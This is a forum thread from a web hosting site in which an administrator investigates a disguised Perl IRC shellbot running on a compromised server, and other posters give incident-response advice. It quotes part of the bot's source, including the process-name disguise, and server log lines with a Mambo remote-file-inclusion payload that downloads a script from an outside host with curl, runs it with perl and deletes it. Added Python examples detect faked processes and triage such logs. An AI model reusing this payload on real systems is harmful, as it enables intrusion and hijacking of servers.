Web Hosting Talk

Nobody Perl !!


adapter
01-16-2006, 03:38 AM
Hi,

I have found in my top process list a running Perl process as nobody:

nobody 17859 2.2 0.2 8076 2452 ? S Jan13 91:42 /usr/sbin/apache/logins

What is it?

jpetersen
01-16-2006, 03:43 AM
Run this: /usr/sbin/lsof -p 17859

It's likely a faked process name, faked by a utility called xhide or something similar. What does ls -al /usr/sbin/apache/logins show, if anything?

Also, I'd run the following:

ps aux|grep ^nobody
ps aux|grep sh
ls -al /tmp|grep -v sess

Note the time the file was run: Jan13 91:42

That's 91 minutes and 42 seconds ago from the time you ran top. You can use that time to start digging through /usr/local/apache/domlogs to see who's running the vulnerable site.

I'd also check /dev/shm (if it's 777), /var/tmp (if it's not symlinked to /tmp), and everything in /tmp.

Furthermore, you may want to look into using suexec and phpsuexec.
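One way to check the first point above (a name in ps/top that is not what is really running) is to compare every nobody-owned process's /proc entry with the path it claims. This is an added example, not code from the thread; the INTERPRETERS set and the three heuristics in classify() are my own assumptions about what a faked argv[0] looks like:

```python
import os
import pwd
import re

# Interpreters whose real binary is typically hidden behind a faked argv[0]
INTERP_RE = re.compile(r"^(perl|python|sh|bash|dash|ksh)\d*(\.\d+)*$")

def _norm(name):
    """Reduce 'python3.10', '-bash', 'perl5' to 'python', 'bash', 'perl'."""
    base = os.path.basename(name).lstrip("-")
    m = INTERP_RE.match(base)
    return m.group(1) if m else base

def classify(argv0, exe_target, argv0_exists):
    """Return why a process looks like it hides behind a faked name, or None.

    argv0        - name shown in ps/top (first field of /proc/<pid>/cmdline)
    exe_target   - what /proc/<pid>/exe really links to
    argv0_exists - whether the path the process claims exists on disk
    """
    if exe_target.endswith(" (deleted)"):
        return "binary was deleted after start: %s" % exe_target
    if argv0.startswith("/") and not argv0_exists:
        return "claimed path does not exist on disk: %s" % argv0
    if INTERP_RE.match(os.path.basename(exe_target)) and _norm(argv0) != _norm(exe_target):
        return "really %s but shows as %s" % (exe_target, argv0)
    return None

def scan_proc(users=("nobody",)):
    """Walk /proc for processes owned by `users`; readlink on other users'
    exe needs root. Returns a list of (pid, user, argv0, reason)."""
    findings = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/status" % pid) as f:
                uid = int(next(l for l in f if l.startswith("Uid:")).split()[1])
            user = pwd.getpwuid(uid).pw_name
            if user not in users:
                continue
            with open("/proc/%s/cmdline" % pid, "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink("/proc/%s/exe" % pid)
        except (OSError, KeyError, StopIteration):
            continue  # process exited, kernel thread, or no permission
        reason = classify(argv0, exe, os.path.exists(argv0))
        if reason:
            findings.append((int(pid), user, argv0, reason))
    return findings

if __name__ == "__main__":
    for pid, user, argv0, reason in scan_proc():
        print(pid, user, argv0, "->", reason)
```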

adapter
01-16-2006, 03:50 AM
Hi,

Many thanks. I have found the files in /tmp:

-rw-r--r-- 1 nobody nobody 17286 Jan 7 20:59 mamb0files.txt
-rw-r--r-- 1 nobody nobody 17252 Jan 12 20:57 mamb0file.txt

but I don't know how they are running, because I see a .txt extension.

I have edited it and I see:


#!/usr/bin/perl
# This code is based on atrix (brazil) shellbot, somebody ripped all the credits, but its obviusly a rip.
# so the original author is atrix. the spread perl code was developed by sirhot (i am almost sure) he is from morocco.
# Note to David Jacoby: Damn, google pwnt us with that 403 ****.
#
# The following comments are only left in the code to ridiculize this guy.
# --------------------------------------------------------------
# Morgan has hacked you!
# Morgan: Argentina, Santiago del estero
# Morgan == Cristian David
# Pamela David == Hermana
#
# Old: http://img521.imageshack.us/img521/3779/morganlammer6tu.png
# This Code Was Originally Writen By "somebody", modified by beford, remodified by
# -------------- ASC [AlbaniaSecurityClan]-------------------
# -----------------------------------------------------------


system("kill -9 `ps ax |grep /usr/sbin/apache/logins |grep -v grep|awk '{print $1;}'`");


my $processo = '/usr/sbin/apache/logins';


my @titi = ("EliteCrew");


etc etc

adapter
01-16-2006, 04:00 AM
If it can help, I have found this in domlogs:

24.111.8.107 - - [13/Jan/2006:15:23:14 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13944 "-" "Mozilla/5.0"
64.62.160.186 - - [13/Jan/2006:15:23:23 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13952 "-" "Mozilla/5.0"
85.228.22.103 - - [13/Jan/2006:15:25:38 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13944 "-" "Mozilla/5.0"
195.171.106.45 - - [13/Jan/2006:15:25:54 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13938 "-" "Mozilla/5.0"
194.29.158.24 - - [13/Jan/2006:15:26:08 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13938 "-" "Mozilla/5.0"
68.178.147.88 - - [13/Jan/2006:15:30:18 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.fullcrew.net/cmd/tool25.dat?&cmd=cd%20/tmp/;curl%20-O%200http://shikoe.net/mamb0file.txt;perl%20mamb0file.txt;rm%20-rf%20mamb0file.txt*? HTTP/1.0" 403 13944 "-" "Mozilla/5.0"

jpetersen
01-16-2006, 04:03 AM
1. Google for: mamb0files.txt

2. The extension of a filename doesn't matter, you can name a file "linux.exe", and as long as it contains perl content, you can still run: perl linux.exe

If you run "file mamb0files.txt" it will tell you it's a perl file because /usr/share/magic will recognize it as such due to the "#!/usr/bin/perl" line.

3. Find out who has the vulnerable version of Mambo installed. The lsof -p <pid> output will show you this.

4. Run netstat -antp to find out what your machine is connected to (like IRC servers, commonly TCP ports 6660 - 6669). Make sure you kill any processes responsible for those connections. Just be cautious about the processes you kill.

lsof -p <pid> will lead you to the cause of the problem. Look for the /home/username/public_html/whatever/whatever and go from there.

jpetersen
01-16-2006, 04:05 AM
Those logs show 403s, which is "Forbidden":


The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. If the server does not wish to make this information available to the client, the status code 404 (Not Found) can be used instead.


Those aren't the right logs, but you're on the right track.


Note the timestamp on this file:

-rw-r--r-- 1 nobody nobody 17286 Jan 7 20:59 mamb0files.txt

This possibly goes back to at least January 7th.
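A way to sift domlogs for this Mambo remote-include pattern and separate the attempts Apache refused (403) from the ones it actually served, which are the requests worth chasing. This is an added example, not from the thread; the sample lines are constructed to mirror the posted ones, with placeholder hosts and addresses:

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache combined-format prefix: client, ident, user, [time], "request", status, size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) \S+')

def query_params(uri):
    """Split the query on '&' only: ';' is part of the injected command."""
    params = {}
    for pair in urlsplit(uri).query.split("&"):
        key, _, val = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(val))
    return params

def mambo_rfi(uri):
    """Return {'include': url, 'cmd': decoded shell command} when the query sets
    mosConfig_absolute_path to a remote URL (the abuse in the logs), else None."""
    qs = query_params(uri)
    inc = qs.get("mosConfig_absolute_path", "")
    if not re.match(r"^(https?|ftp)://", inc, re.I):
        return None
    return {"include": inc, "cmd": qs.get("cmd", "")}

def triage(lines):
    """Bucket matching requests by whether Apache refused (403) or served them."""
    out = {"blocked": [], "served": []}
    for line in lines:
        m = LOG_RE.match(line)
        hit = mambo_rfi(m.group("uri")) if m else None
        if hit is None:
            continue
        rec = {"ip": m.group("ip"), "time": m.group("time"),
               "status": int(m.group("status")), **hit}
        out["blocked" if rec["status"] == 403 else "served"].append(rec)
    return out

# Constructed sample lines modelled on the thread's domlog entries (placeholder hosts)
SAMPLE = [
    '203.0.113.7 - - [13/Jan/2006:15:23:14 +0100] "GET /index.php?option=com_content'
    '&mosConfig_absolute_path=http://attacker.example/t.dat?&cmd=cd%20/tmp/;curl%20-O'
    '%20http://drop.example/mamb0file.txt;perl%20mamb0file.txt HTTP/1.0" 403 13944 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [07/Jan/2006:20:58:51 +0100] "GET /index.php?option=com_content'
    '&mosConfig_absolute_path=http://attacker.example/t.dat?&cmd=cd%20/tmp/;perl%20x.txt HTTP/1.0" 200 1287 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [13/Jan/2006:15:40:02 +0100] "GET /index.php?option=com_content&Itemid=1 HTTP/1.0" 200 13944 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for kind, recs in triage(SAMPLE).items():
        for rec in recs:
            print(kind, rec["time"], rec["ip"], rec["cmd"])
```

Run it as `python3 script.py < /dev/null` after replacing SAMPLE with the lines of each domlog; a served hit dated before the Jan 7 file timestamp tells you which site was the entry point.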

kyrka
01-25-2006, 12:07 PM
Have a look in /tmp and I expect you'll find mamb0file.txt or something similar.
This is an abuse of a vulnerable Mambo installation - most likely because file perms were set wrong. (chmod 777, for example).

K.